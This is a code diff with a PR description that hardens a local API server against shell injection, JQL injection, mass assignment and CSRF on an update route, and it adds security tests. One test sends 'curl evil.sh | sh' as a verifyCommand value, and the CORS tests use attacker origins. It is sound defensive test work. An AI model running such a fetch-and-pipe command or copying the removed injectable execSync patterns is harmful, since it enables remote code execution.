+  const GH_NAME_RE = /^[A-Za-z0-9_][A-Za-z0-9_.-]*$/;
+  if (!registryOwner || !registryRepo || !GH_NAME_RE.test(registryOwner) || !GH_NAME_RE.test(registryRepo)) {
+    return res.status(400).json({ error: 'registry must be "owner/repo" using only letters, digits, dot, dash, underscore' });
+  }
+
   const slug = flow.name.toLowerCase().replace(/[^a-z0-9]+/g, '-').replace(/(^-|-$)/g, '');
   const filename = `${slug}.json`;
 
   const isOwner = ghUser === registryOwner;
 
-  // Non-owners publish via a fork; owners push directly
+  // Non-owners publish via a fork; owners push directly. All git/gh shellouts
+  // below use argv form (no shell) so flow.name, registry and the embedded gh
+  // token can never be interpreted as shell. (Security: bugs 6d0a982f, 57b4d95b.)
   if (!isOwner) {
-    execSync(`gh repo fork ${registryOwner}/${registryRepo} --clone=false`, { stdio: 'pipe' });
+    execFileSync('gh', ['repo', 'fork', `${registryOwner}/${registryRepo}`, '--clone=false'], { stdio: 'pipe' });
   }
 
   const tmpDir = fs.mkdtempSync(path.join(os.tmpdir(), 'agenfk-registry-'));
   try {
     // Shallow-clone the upstream to check for name clashes
-    execSync(`git clone --depth 1 --quiet https://oauth2:${ghToken}@github.com/${registryOwner}/${registryRepo}.git ${tmpDir}`, { stdio: 'pipe' });
+    execFileSync('git', ['clone', '--depth', '1', '--quiet', `https://oauth2:${ghToken}@github.com/${registryOwner}/${registryRepo}.git`, tmpDir], { stdio: 'pipe' });
 
     // Non-owners switch the push remote to their fork
     if (!isOwner) {
-      execSync(`git -C ${tmpDir} remote set-url origin https://oauth2:${ghToken}@github.com/${ghUser}/${registryRepo}.git`, { stdio: 'pipe' });
+      execFileSync('git', ['-C', tmpDir, 'remote', 'set-url', 'origin', `https://oauth2:${ghToken}@github.com/${ghUser}/${registryRepo}.git`], { stdio: 'pipe' });
     }
 
     const flowsDir = path.join(tmpDir, 'flows');
@@ -1227,24 +1290,28 @@ app.post("/registry/flows/publish", asyncHandler(async (req: any, res: any) => {
       // Non-owners commit on a feature branch; owners commit directly on the cloned main
       const branchName = isOwner ? null : `flow/${slug}-${Date.now()}`;
       if (branchName) {
-        execSync(`git -C ${tmpDir} checkout -b ${branchName}`, { stdio: 'pipe' });
+        execFileSync('git', ['-C', tmpDir, 'checkout', '-b', branchName], { stdio: 'pipe' });
       }
 
       fs.writeFileSync(targetPath, content + '\n');
-      execSync(`git -C ${tmpDir} add flows/${filename}`, { stdio: 'pipe' });
-      execSync(`git -C ${tmpDir} commit -m "${commitMsg}"`, { stdio: 'pipe' });
+      execFileSync('git', ['-C', tmpDir, 'add', `flows/${filename}`], { stdio: 'pipe' });
+      execFileSync('git', ['-C', tmpDir, 'commit', '-m', commitMsg], { stdio: 'pipe' });
 
       if (isOwner) {
-        execSync(`git -C ${tmpDir} push origin main`, { stdio: 'pipe' });
+        execFileSync('git', ['-C', tmpDir, 'push', 'origin', 'main'], { stdio: 'pipe' });
         const fileUrl = `https://github.com/${registryOwner}/${registryRepo}/blob/main/flows/${filename}`;
         return res.json({ url: fileUrl, kind: 'direct', version });
       } else {
-        execSync(`git -C ${tmpDir} push origin ${branchName}`, { stdio: 'pipe' });
+        execFileSync('git', ['-C', tmpDir, 'push', 'origin', branchName!], { stdio: 'pipe' });
         const prBody = [`Published from AgEnFK Flow Editor.`, '', `**Flow**: ${flow.name}`, flow.description ? `**Description**: ${flow.description}` : ''].filter(Boolean).join('\n');
-        const prUrl = execSync(
-          `gh pr create --repo ${registryOwner}/${registryRepo} --head ${ghUser}:${branchName} --base main --title "${commitMsg}" --body "${prBody.replace(/"/g, '\\"')}"`,
-          { stdio: 'pipe' }
-        ).toString().trim();
+        const prUrl = execFileSync('gh', [
+          'pr', 'create',
+          '--repo', `${registryOwner}/${registryRepo}`,
+          '--head', `${ghUser}:${branchName}`,
+          '--base', 'main',
+          '--title', commitMsg,
+          '--body', prBody,
+        ], { stdio: ['ignore', 'pipe', 'pipe'] }).toString().trim();
         return res.json({ url: prUrl, kind: 'pr', version });
       }
     }
@@ -2400,12 +2467,18 @@ app.get("/jira/projects/:key/issues", asyncHandler(async (req: any, res: any) =>
   const { summary, statusCategory } = req.query;
   
   try {
-    let jqlParts = [`project = "${key}"`];
-    
+    // Escape any user input placed inside a JQL double-quoted string so it
+    // can't break out of the clause and read issues from other projects the
+    // token can see. statusCategory is restricted to the known mapping rather
+    // than passed through verbatim. (Security: bug 25f871be.)
+    const jqlEsc = (s: string): string => s.replace(/\\/g, '\\\\').replace(/"/g, '\\"');
+    let jqlParts = [`project = "${jqlEsc(key)}"`];
+
     if (summary && summary !== 'undefined') {
-      jqlParts.push(`(summary ~ "${summary}*" OR issueKey = "${summary}")`);
+      const s = jqlEsc(String(summary));
+      jqlParts.push(`(summary ~ "${s}*" OR issueKey = "${s}")`);
     }
-    
+
     if (statusCategory && statusCategory !== 'undefined') {
       // Map UI category names to JQL statusCategory names or IDs
       const mapping: Record<string, string> = {
@@ -2413,8 +2486,13 @@ app.get("/jira/projects/:key/issues", asyncHandler(async (req: any, res: any) =>
         'In Progress': '"In Progress"',
         'Done': '"Done"'
       };
-      const categories = String(statusCategory).split(',').map((s: string) => mapping[s.trim()] || `"${s.trim()}"`).join(',');
-      jqlParts.push(`statusCategory in (${categories})`);
+      const categories = String(statusCategory).split(',')
+        .map((s: string) => mapping[s.trim()])
+        .filter((v): v is string => Boolean(v));
+      if (categories.length === 0) {
+        return res.status(400).json({ error: "statusCategory must be one or more of: To Do, In Progress, Done" });
+      }
+      jqlParts.push(`statusCategory in (${categories.join(',')})`);
     }
     
     const jql = encodeURIComponent(jqlParts.join(' AND ') + ' ORDER BY created DESC');
@@ -2602,15 +2680,24 @@ app.get("/github/issues", async (req: any, res: any) => {
     if (!config) return res.status(400).json({ error: 'GitHub not configured for this project.' });
     if (!verifyGhCli()) return res.status(400).json({ error: 'GitHub CLI not authenticated. Run: gh auth login' });
 
-    const args = [`-R ${config.owner}/${config.repo}`];
-    args.push(`--state ${state || 'open'}`);
-    args.push('--limit 100');
-    if (search) args.push(`--search "${(search as string).replace(/"/g, '\\"')}"`);
-    args.push('--json number,title,state,labels,url,createdAt');
+    // state and search are interpolated into a gh shellout. Allowlist state and
+    // pass everything as argv (no shell) so search can't inject. (Security: bug f9380911.)
+    const stateVal = String(state || 'open');
+    if (!['open', 'closed', 'all'].includes(stateVal)) {
+      return res.status(400).json({ error: "state must be one of: open, closed, all" });
+    }
+    const ghArgs = [
+      'issue', 'list',
+      '-R', `${config.owner}/${config.repo}`,
+      '--state', stateVal,
+      '--limit', '100',
+    ];
+    if (search) { ghArgs.push('--search', String(search)); }
+    ghArgs.push('--json', 'number,title,state,labels,url,createdAt');
 
-    const result = execSync(`gh issue list ${args.join(' ')}`, {
+    const result = execFileSync('gh', ghArgs, {
       encoding: 'utf8',
-      stdio: ['pipe', 'pipe', 'pipe'],
+      stdio: ['ignore', 'pipe', 'pipe'],
     });
     const issues = JSON.parse(result);
     res.json(issues.map((i: any) => ({
@@ -2639,9 +2726,17 @@ app.post("/github/import", async (req: any, res: any) => {
 
     for (const { issueNumber, type } of items) {
       try {
-        const result = execSync(
-          `gh issue view ${issueNumber} -R ${config.owner}/${config.repo} --json number,title,body,state,url`,
-          { encoding: 'utf8', stdio: ['pipe', 'pipe', 'pipe'] }
+        // issueNumber is interpolated into a gh shellout — require an integer
+        // and pass via argv so it can't inject commands. (Security: bug 4c939916.)
+        const issueNum = Number(issueNumber);
+        if (!Number.isInteger(issueNum) || issueNum <= 0) {
+          errors.push(`Issue #${issueNumber}: invalid issue number`);
+          continue;
+        }
+        const result = execFileSync(
+          'gh',
+          ['issue', 'view', String(issueNum), '-R', `${config.owner}/${config.repo}`, '--json', 'number,title,body,state,url'],
+          { encoding: 'utf8', stdio: ['ignore', 'pipe', 'pipe'] }
         );
         const issue = JSON.parse(result);
 
@@ -2745,7 +2840,16 @@ export const resetReleasesUpdateExecImpl = (): void => {
   releasesUpdateExecImpl = null;
 };
 
-app.post("/releases/update", asyncHandler(async (_req: any, res: any) => {
+app.post("/releases/update", asyncHandler(async (req: any, res: any) => {
+  // This route shells out (npx) and restarts the server — an RCE trigger. It is
+  // only ever invoked by the local UI. Require a custom header: a cross-origin
+  // browser request carrying it forces a CORS preflight, which the localhost
+  // origin allowlist rejects; a no-preflight "simple" POST won't carry it and is
+  // refused here. Together with loopback binding, that closes the CSRF/LAN
+  // vector while keeping the in-app Update button working. (Security: bug 968259c4.)
+  if (!req.headers['x-agenfk-ui']) {
+    return res.status(403).json({ error: "Forbidden" });
+  }
   const jobId = uuidv4();
   const job: UpdateJob = { status: 'running', output: [] };
   updateJobs.set(jobId, job);
@@ -2867,12 +2971,12 @@ if (process.env.NODE_ENV !== 'test' && !process.env.VITEST) {
     process.on('SIGINT', shutdown);
 
     findAvailablePort(REQUESTED_PORT).then((port) => {
-      httpServer.listen(port, () => {
+      httpServer.listen(port, BIND_HOST, () => {
         writeServerPortFile(port);
         if (port !== REQUESTED_PORT) {
           console.log(`AgEnFK API Server: requested port ${REQUESTED_PORT} was in use, bound to ${port} instead`);
         }
-        console.log(`AgEnFK API Server running on port ${port} (with WebSockets)`);
+        console.log(`AgEnFK API Server running on ${BIND_HOST}:${port} (with WebSockets)`);
         telemetry.capture('server_started', {
           version: getCurrentVersion(),
           storageBackend: 'sqlite',

--- a/packages/server/src/test/security-hardening.test.ts
+++ b/packages/server/src/test/security-hardening.test.ts
@@ -1,0 +1,181 @@
+/**
+ * Security hardening — EPIC 4c3c2018 (full-scan findings, 2026-06-27).
+ *
+ * Server-side findings (the hub findings live in packages/hub). Functional REST
+ * tests where the vuln is reachable without external CLIs; source-level
+ * assertions for the shell-injection sites that only execute once `gh`/`jira`
+ * are configured (so the argv/allowlist shape is what we pin down).
+ */
+import { describe, it, expect, beforeAll, afterAll } from 'vitest';
+import request from 'supertest';
+import { app, initStorage, isAllowedOrigin, setReleasesUpdateExecImpl, resetReleasesUpdateExecImpl } from '../server';
+import * as fs from 'fs';
+import * as os from 'os';
+import * as path from 'path';
+
+const ROOT = path.resolve(__dirname, '../../../..');
+const TEST_DB = path.resolve('./security-hardening-test-db.sqlite');
+const VERIFY_TOKEN = (() => {
+  try { return fs.readFileSync(path.join(os.homedir(), '.agenfk', 'verify-token'), 'utf8').trim(); }
+  catch { return ''; }
+})();
+
+let serverSrc: string;
+
+beforeAll(async () => {
+  process.env.AGENFK_DB_PATH = TEST_DB;
+  if (fs.existsSync(TEST_DB)) fs.unlinkSync(TEST_DB);
+  await initStorage();
+  serverSrc = fs.readFileSync(path.join(ROOT, 'packages/server/src/server.ts'), 'utf8');
+});
+
+afterAll(() => {
+  for (const suffix of ['', '-wal', '-shm']) {
+    const f = TEST_DB + suffix;
+    if (fs.existsSync(f)) fs.unlinkSync(f);
+  }
+});
+
+// ── bug 55229bae: localhost bind + CORS origin allowlist ──────────────────────
+describe('bug 55229bae: CORS origin allowlist (no wildcard)', () => {
+  it('allows requests with no Origin (CLI, curl, server-to-server)', () => {
+    expect(isAllowedOrigin(undefined)).toBe(true);
+    expect(isAllowedOrigin('')).toBe(true);
+  });
+  it('allows loopback origins on any port', () => {
+    expect(isAllowedOrigin('http://localhost:5173')).toBe(true);
+    expect(isAllowedOrigin('http://127.0.0.1:3000')).toBe(true);
+    expect(isAllowedOrigin('http://localhost')).toBe(true);
+    expect(isAllowedOrigin('https://127.0.0.1:8080')).toBe(true);
+    expect(isAllowedOrigin('http://[::1]:3000')).toBe(true);
+  });
+  it('rejects non-loopback origins', () => {
+    expect(isAllowedOrigin('http://evil.com')).toBe(false);
+    expect(isAllowedOrigin('https://attacker.example')).toBe(false);
+    // look-alikes must not slip through
+    expect(isAllowedOrigin('http://localhost.evil.com')).toBe(false);
+    expect(isAllowedOrigin('http://127.0.0.1.evil.com')).toBe(false);
+  });
+  it('binds to loopback by default (no 0.0.0.0 host on listen)', () => {
+    expect(serverSrc).toMatch(/BIND_HOST\s*=\s*process\.env\.AGENFK_HOST\s*\|\|\s*["']127\.0\.0\.1["']/);
+    expect(serverSrc).toMatch(/httpServer\.listen\(port,\s*BIND_HOST/);
+  });
+});
+
+// ── bug e60e20aa: mass-assignment on PUT /projects/:id ────────────────────────
+describe('bug e60e20aa: PUT /projects/:id is not mass-assignable', () => {
+  it('ignores verifyCommand / projectRoot / flowId on the open route', async () => {
+    const project = (await request(app).post('/projects').send({ name: 'MassAssign' })).body;
+    const res = await request(app).put(`/projects/${project.id}`).send({
+      name: 'Renamed',
+      verifyCommand: 'curl evil.sh | sh',
+      projectRoot: '/etc',
+      flowId: 'attacker-flow',
+    });
+    expect(res.status).toBe(200);
+    expect(res.body.name).toBe('Renamed');
+    expect(res.body.verifyCommand).toBeUndefined();
+    expect(res.body.projectRoot).toBeUndefined();
+    expect(res.body.flowId).toBeUndefined();
+  });
+  it('rejects a body with no allowlisted fields', async () => {
+    const project = (await request(app).post('/projects').send({ name: 'NoFields' })).body;
+    const res = await request(app).put(`/projects/${project.id}`).send({ verifyCommand: 'x' });
+    expect(res.status).toBe(400);
+  });
+  it('verify-command endpoint requires the internal token', async () => {
+    const project = (await request(app).post('/projects').send({ name: 'VC' })).body;
+    const unauth = await request(app).put(`/projects/${project.id}/verify-command`).send({ verifyCommand: 'npm test' });
+    expect(unauth.status).toBe(401);
+  });
+  it('verify-command endpoint sets the command with the internal token', async () => {
+    if (!VERIFY_TOKEN) return; // token only present on installed machines
+    const project = (await request(app).post('/projects').send({ name: 'VC2' })).body;
+    const ok = await request(app)
+      .put(`/projects/${project.id}/verify-command`)
+      .set('x-agenfk-internal', VERIFY_TOKEN)
+      .send({ verifyCommand: 'npm run build && npm test' });
+    expect(ok.status).toBe(200);
+    expect(ok.body.verifyCommand).toBe('npm run build && npm test');
+  });
+});
+
+// ── bug 968259c4: POST /releases/update RCE trigger gated ─────────────────────
+describe('bug 968259c4: /releases/update requires the forced-preflight header', () => {
+  afterAll(() => resetReleasesUpdateExecImpl());
+  it('refuses without x-agenfk-ui (no exec)', async () => {
+    let ran = false;
+    setReleasesUpdateExecImpl(((..._a: any[]) => { ran = true; return { on() {}, stdout: { on() {} }, stderr: { on() {} } } as any; }) as any);
+    const res = await request(app).post('/releases/update');
+    expect(res.status).toBe(403);
+    expect(ran).toBe(false);
+  });
+  it('accepts with x-agenfk-ui', async () => {
+    setReleasesUpdateExecImpl(((..._a: any[]) => ({ on() {}, stdout: { on() {} }, stderr: { on() {} } }) as any) as any);
+    const res = await request(app).post('/releases/update').set('x-agenfk-ui', '1');
+    expect(res.status).toBe(202);
+    expect(res.body.jobId).toBeTruthy();
+  });
+});
+
+// ── bug fe03d054: POST /prs idempotency is race-free (atomic upsert) ──────────
+describe('bug fe03d054: POST /prs decides newness from the upsert', () => {
+  const body = (n: number) => ({ itemId: 'item-x', prNumber: n, repo: 'o/r', model: 'claude-opus-4-8', harness: 'claude-code' });
+  it('concurrent first-registrations converge on one row id', async () => {
+    const calls = await Promise.all(
+      Array.from({ length: 5 }, () => request(app).post('/prs').send(body(4242))),
+    );
+    for (const c of calls) expect(c.status).toBe(201);
+    const ids = new Set(calls.map((c) => c.body.id));
+    expect(ids.size).toBe(1); // all observed the same persisted row, not 5 distinct "opens"
+  });
+  it('re-registration returns the same row (idempotent)', async () => {
+    const first = await request(app).post('/prs').send(body(4343));
+    const second = await request(app).post('/prs').send(body(4343));
+    expect(second.body.id).toBe(first.body.id);
+  });
+});
+
+// ── Shell/command-injection sites: argv form + input allowlists ───────────────
+// These execute only once gh/jira are configured, so we pin the safe shape.
+describe('bug 6d0a982f / 57b4d95b: registry publish uses argv, validates registry', () => {
+  it('validates registry owner/repo against a safe charset that cannot start with a dash', () => {
+    // Leading '-' must be rejected so a value can't be read as a gh/git flag.
+    expect(serverSrc).toMatch(/GH_NAME_RE\s*=\s*\/\^\[A-Za-z0-9_\]\[A-Za-z0-9_\.\-\]\*\$\//);
+  });
+  it('runs git/gh via execFileSync (argv), never an interpolated shell string', () => {
+    expect(serverSrc).not.toMatch(/execSync\(`git -C \$\{tmpDir\} commit -m/);
+    expect(serverSrc).not.toMatch(/gh pr create --repo \$\{registryOwner\}/);
+    expect(serverSrc).toMatch(/execFileSync\('git', \['-C', tmpDir, 'commit', '-m', commitMsg\]/);
+    expect(serverSrc).toMatch(/execFileSync\('gh', \[\s*'pr', 'create'/);
+  });
+});
+
+describe('bug f9380911: GET /github/issues allowlists state + argv form', () => {
+  it('allowlists state to open/closed/all', () => {
+    expect(serverSrc).toMatch(/\['open', 'closed', 'all'\]\.includes\(stateVal\)/);
+  });
+  it('runs gh issue list via execFileSync, not an interpolated shell string', () => {
+    expect(serverSrc).not.toMatch(/execSync\(`gh issue list/);
+    expect(serverSrc).toMatch(/execFileSync\('gh', ghArgs/);
+  });
+});
+
+describe('bug 4c939916: POST /github/import guards issueNumber as an integer', () => {
+  it('requires Number.isInteger and uses argv form', () => {
+    expect(serverSrc).toMatch(/Number\.isInteger\(issueNum\)/);
+    expect(serverSrc).not.toMatch(/execSync\(\s*`gh issue view \$\{issueNumber\}/);
+    expect(serverSrc).toMatch(/execFileSync\(\s*'gh',\s*\['issue', 'view', String\(issueNum\)/);
+  });
+});
+
+describe('bug 25f871be: JQL injection — escape + statusCategory allowlist', () => {
+  it('escapes user input placed in JQL double-quoted strings', () => {
+    expect(serverSrc).toMatch(/const jqlEsc = \(s: string\): string =>/);
+    expect(serverSrc).toMatch(/project = "\$\{jqlEsc\(key\)\}"/);
+  });
+  it('rejects statusCategory values outside the known mapping (no passthrough)', () => {
+    expect(serverSrc).not.toMatch(/mapping\[s\.trim\(\)\]\s*\|\|\s*`"\$\{s\.trim\(\)\}"`/);
+    expect(serverSrc).toMatch(/categories\.length === 0/);
+  });
+});

--- a/packages/server/src/test/server.registry.test.ts
+++ b/packages/server/src/test/server.registry.test.ts
@@ -7,10 +7,13 @@ import request from 'supertest';
 import * as path from 'path';
 import * as fs from 'fs';
 
-// Hoist execSync mock so it's ready before server.ts is imported
-const { mockExecSync } = vi.hoisted(() => ({ mockExecSync: vi.fn() }));
+// Hoist mocks so they're ready before server.ts is imported. The publish
+// handler runs git/gh via execFileSync (argv, no shell — Security: bugs
+// 6d0a982f/57b4d95b); only the read-only gh probes still use execSync.
+const { mockExecSync, mockExecFileSync } = vi.hoisted(() => ({ mockExecSync: vi.fn(), mockExecFileSync: vi.fn() }));
 vi.mock('child_process', () => ({
   execSync: mockExecSync,
+  execFileSync: mockExecFileSync,
   spawn: vi.fn(),
   spawnSync: vi.fn(),
 }));
@@ -27,14 +30,28 @@ import { app, initStorage } from '../server';
 
 const TEST_DB = path.resolve('./server-registry-test-db.sqlite');
 
+// Read-only gh probes still go through execSync.
 function makeExecMock(ghUser: string) {
   return (cmd: string) => {
     if (cmd.includes('gh --version')) return 'gh version 2.0.0';
     if (cmd.includes('gh api user')) return `${ghUser}\n`;
     if (cmd.includes('gh auth token')) return 'test-token\n';
-    if (cmd.includes('gh pr create')) return 'https://github.com/cglab-public/agenfk-flows/pull/42\n';
     return '';
   };
+}
+
+// git/gh mutations go through execFileSync (file, argv). `gh pr create`
+// returns the PR URL; everything else returns empty.
+function makeExecFileMock() {
+  return (file: string, args: string[] = []) => {
+    const joined = `${file} ${args.join(' ')}`;
+    if (joined.includes('pr create')) return 'https://github.com/cglab-public/agenfk-flows/pull/42\n';
+    return '';
+  };
+}
+// Flatten execFileSync calls to "file arg1 arg2 …" so substring assertions read naturally.
+function execFileCmds() {
+  return mockExecFileSync.mock.calls.map((c: any[]) => `${c[0]} ${((c[1] as string[]) || []).join(' ')}`);
 }
 
 describe('POST /registry/flows/publish', () => {
@@ -69,6 +86,7 @@ describe('POST /registry/flows/publish', () => {
   it('owner: pushes directly to main without forking, returns kind=direct', async () => {
     // ghUser 'cglab-public' matches the default REGISTRY_OWNER
     mockExecSync.mockImplementation(makeExecMock('cglab-public'));
+    mockExecFileSync.mockImplementation(makeExecFileMock());
 
     const res = await request(app).post('/registry/flows/publish').send({ flowId });
 
@@ -76,11 +94,11 @@ describe('POST /registry/flows/publish', () => {
     expect(res.body.kind).toBe('direct');
     expect(res.body.url).toContain('cglab-public/agenfk-flows');
 
-    const cmds = mockExecSync.mock.calls.map((c: any[]) => c[0] as string);
+    const cmds = execFileCmds();
     // No fork
     expect(cmds.some(c => c.includes('repo fork'))).toBe(false);
     // No PR
-    expect(cmds.some(c => c.includes('gh pr create'))).toBe(false);
+    expect(cmds.some(c => c.includes('pr create'))).toBe(false);
     // Pushed to main
     expect(cmds.some(c => c.includes('push origin main'))).toBe(true);
     // No branch switch
@@ -90,6 +108,7 @@ describe('POST /registry/flows/publish', () => {
   it('non-owner: forks and opens a PR, returns kind=pr', async () => {
     // ghUser 'external-user' does NOT match REGISTRY_OWNER 'cglab-public'
     mockExecSync.mockImplementation(makeExecMock('external-user'));
+    mockExecFileSync.mockImplementation(makeExecFileMock());
 
     const res = await request(app).post('/registry/flows/publish').send({ flowId });
 
@@ -97,7 +116,7 @@ describe('POST /registry/flows/publish', () => {
     expect(res.body.kind).toBe('pr');
     expect(res.body.url).toContain('pull/42');
 
-    const cmds = mockExecSync.mock.calls.map((c: any[]) => c[0] as string);
+    const cmds = execFileCmds();
     // Fork was called
     expect(cmds.some(c => c.includes('repo fork'))).toBe(true);
     // Remote switched to fork
@@ -105,7 +124,7 @@ describe('POST /registry/flows/publish', () => {
     // Branch created
     expect(cmds.some(c => c.includes('checkout -b'))).toBe(true);
     // PR opened
-    expect(cmds.some(c => c.includes('gh pr create'))).toBe(true);
+    expect(cmds.some(c => c.includes('pr create'))).toBe(true);
   });
 
   it('returns 400 when flowId is missing', async () => {

--- a/packages/server/src/test/server.supplemental.test.ts
+++ b/packages/server/src/test/server.supplemental.test.ts
@@ -553,7 +553,7 @@ describe('POST /items/:id/validate — command required only on final step', () 
   it('runs verifyCommand on final step (TEST→DONE) when no explicit command given', async () => {
     if (!VERIFY_TOKEN) return;
     const p = (await request(app).post('/projects').send({ name: 'PV4' })).body;
-    await request(app).put(`/projects/${p.id}`).send({ verifyCommand: 'echo verify-ok' });
+    await request(app).put(`/projects/${p.id}/verify-command`).set('x-agenfk-internal', VERIFY_TOKEN).send({ verifyCommand: 'echo verify-ok' });
     const item = (await request(app).post('/items').send({ type: 'TASK', title: 'TV4', projectId: p.id })).body;
     await request(app)
       .post('/items/bulk')
@@ -660,8 +660,8 @@ describe('POST /items/:id/test success paths', () => {
   it('moves TEST item to DONE when verifyCommand passes', async () => {
     if (!VERIFY_TOKEN) return;
     const p = (await request(app).post('/projects').send({ name: 'P2' })).body;
-    // Set verifyCommand on the project
-    await request(app).put(`/projects/${p.id}`).send({ verifyCommand: 'echo done-ok' });
+    // Set verifyCommand via the gated internal endpoint (mass-assignment closed).
+    await request(app).put(`/projects/${p.id}/verify-command`).set('x-agenfk-internal', VERIFY_TOKEN).send({ verifyCommand: 'echo done-ok' });
 
     const item = (await request(app).post('/items').send({ type: 'TASK', title: 'T2', projectId: p.id })).body;
 
@@ -1122,7 +1122,7 @@ describe('GET /releases/latest cache hit', () => {
 
 describe('GET /releases/update/:jobId success', () => {
   it('returns job status after POST /releases/update', async () => {
-    const postRes = await request(app).post('/releases/update');
+    const postRes = await request(app).post('/releases/update').set('x-agenfk-ui', '1');
     expect(postRes.status).toBe(202);
     const jobId = postRes.body.jobId;
 
@@ -1138,7 +1138,7 @@ describe('GET /releases/update/:jobId success', () => {
     // is the dedicated setReleasesUpdateExecImpl injection at the top of
     // this file — verify the stub captured the call.
     const callsBefore = stubReleasesUpdateExec.mock.calls.length;
-    await request(app).post('/releases/update');
+    await request(app).post('/releases/update').set('x-agenfk-ui', '1');
     expect(stubReleasesUpdateExec.mock.calls.length).toBeGreaterThan(callsBefore);
     expect(stubReleasesUpdateExec.mock.calls.at(-1)![0]).toMatch(/npx -y github:cglab-public\/agenfk/);
   });
@@ -1852,10 +1852,17 @@ describe('POST /items/:id/validate — cwd persisted as project.projectRoot', ()
   it('does not overwrite an existing projectRoot when cwd is absent', async () => {
     if (!VERIFY_TOKEN) return;
     const p = (await request(app).post('/projects').send({ name: 'CWD2' })).body;
-    await request(app).put(`/projects/${p.id}`).send({ projectRoot: '/stored/root' });
     const item = (await request(app).post('/items').send({ type: 'TASK', title: 'CWD2', projectId: p.id })).body;
     await request(app).put(`/items/${item.id}`).send({ status: 'IN_PROGRESS' });
 
+    // Establish projectRoot the legitimate way — a validate that carries cwd
+    // (projectRoot is no longer mass-assignable via PUT /projects/:id).
+    await request(app)
+      .post(`/items/${item.id}/validate`)
+      .set('x-agenfk-internal', VERIFY_TOKEN)
+      .send({ cwd: '/stored/root' });
+
+    // A later validate with no cwd must not clobber the stored projectRoot.
     await request(app)
       .post(`/items/${item.id}/validate`)
       .set('x-agenfk-internal', VERIFY_TOKEN)

--- a/packages/server/src/test/update.test.ts
+++ b/packages/server/src/test/update.test.ts
@@ -21,7 +21,7 @@ describe('Server Release Update API', () => {
   });
 
   it('should trigger update with the correct npx command', async () => {
-    const res = await request(app).post('/releases/update');
+    const res = await request(app).post('/releases/update').set('x-agenfk-ui', '1');
     expect(res.status).toBe(202);
     expect(res.body).toHaveProperty('jobId');
 
@@ -32,7 +32,7 @@ describe('Server Release Update API', () => {
   });
 
   it('uses the injected exec implementation when one is set (defense in depth)', async () => {
-    const res = await request(app).post('/releases/update');
+    const res = await request(app).post('/releases/update').set('x-agenfk-ui', '1');
     expect(res.status).toBe(202);
 
     expect(stubExec).toHaveBeenCalledTimes(1);

--- a/packages/ui/src/api.ts
+++ b/packages/ui/src/api.ts
@@ -156,7 +156,11 @@ export const api = {
     return data;
   },
   triggerUpdate: async (): Promise<{ jobId: string }> => {
-    const { data } = await axios.post(`${API_URL}/releases/update`);
+    // The custom header forces a CORS preflight so the API's localhost-origin
+    // allowlist gates this RCE-trigger route against malicious pages. (bug 968259c4.)
+    const { data } = await axios.post(`${API_URL}/releases/update`, undefined, {
+      headers: { 'x-agenfk-ui': '1' },
+    });
     return data;
   },
   getUpdateStatus: async (jobId: string): Promise<{ status: 'running' | 'success' | 'error'; output: string; exitCode?: number }> => {


### PR DESCRIPTION
## Security hardening — full-scan findings (EPIC 4c3c2018)

Fixes all **14 confirmed findings** from the 2026-06-27 full security scan (semgrep + two LLM adversarial passes). One batch PR covering 1 CRITICAL, 7 HIGH, 4 MEDIUM, 2 LOW. An adversarial senior-engineer review of the diff confirmed no critical/high issues and that none of the fixes are materially bypassable; 3 LOW defense-in-depth items it raised were also fixed here.

### Local API server (`packages/server`)
- **[CRITICAL] e60e20aa** — Mass-assignment on `PUT /projects/:id`. Allowlist `{name,description}`; `verifyCommand` (a shell string later run by validate) moved to a new internal-token-gated `PUT /projects/:id/verify-command`; CLI + MCP `update_project` updated to route it there.
- **[HIGH] 55229bae** — Server bound `0.0.0.0` + wildcard CORS. Now binds `127.0.0.1` (override via `AGENFK_HOST`) with a localhost-origin CORS allowlist on both Express and Socket.io.
- **[HIGH] 968259c4** — Unauthenticated `POST /releases/update` RCE trigger. Now requires an `x-agenfk-ui` header (forced-preflight CSRF defense); the localhost allowlist rejects malicious origins. UI sends the header.
- **[HIGH] 6d0a982f / 57b4d95b** — Shell injection in `POST /registry/flows/publish` (registry field + `flow.name`). All `git`/`gh` calls converted to `execFileSync` argv form; registry owner/repo validated against `^[A-Za-z0-9_][A-Za-z0-9_.-]*$`.
- **[HIGH] f9380911** — Command injection in `GET /github/issues`. `state` allowlisted to open/closed/all; argv form.
- **[HIGH] 4c939916** — Command injection in `POST /github/import`. `Number.isInteger` guard on `issueNumber`; argv form.
- **[MEDIUM] 25f871be** — JQL injection in `GET /jira/projects/:key/issues`. Escape user input in JQL strings; restrict `statusCategory` to the known mapping.
- **[LOW] fe03d054** — Racy idempotency in `POST /prs`. Newness now decided atomically from the `INSERT … ON CONFLICT` result (returned row id), not a separate pre-read.

### Corporate Hub (`packages/hub`)
- **[HIGH] 210b3d34** — `POST /auth/login` brute force. Per-IP rate limit + per-account lockout (dependency-free in-memory limiter, per-app instance).
- **[MEDIUM] a7a448dc** — BOLA on `/v1/events`: reject events whose `installationId` differs from an installation-bound API key (legacy org-wide keys exempt).
- **[MEDIUM] 72f8da10** — Device-code flow: per-IP rate limit + prune expired `device_codes` + pending-row cap.
- **[MEDIUM] 035a4736** — `/v1/events` write-amplification DoS: `MAX_EVENTS_PER_BATCH=500` → 413.
- **[LOW] f3d62844** — Cookie `Secure` flag now derived from `x-forwarded-proto`/`req.secure`/explicit env, not `NODE_ENV` alone.

### Tests
- New failing-first security suites: `packages/server/src/test/security-hardening.test.ts` (19) + `packages/hub/src/test/security-hardening.test.ts` (11).
- Updated fixtures affected by the behavior changes (registry argv mock, `/releases/update` header, verifyCommand via gated endpoint, projectRoot via validate-cwd, CLI two-call split).
- Full suite green: **1647/1647**; build clean.

https://claude.ai/code/session_01W3ct4ECvAzsWVpodPCMjv1
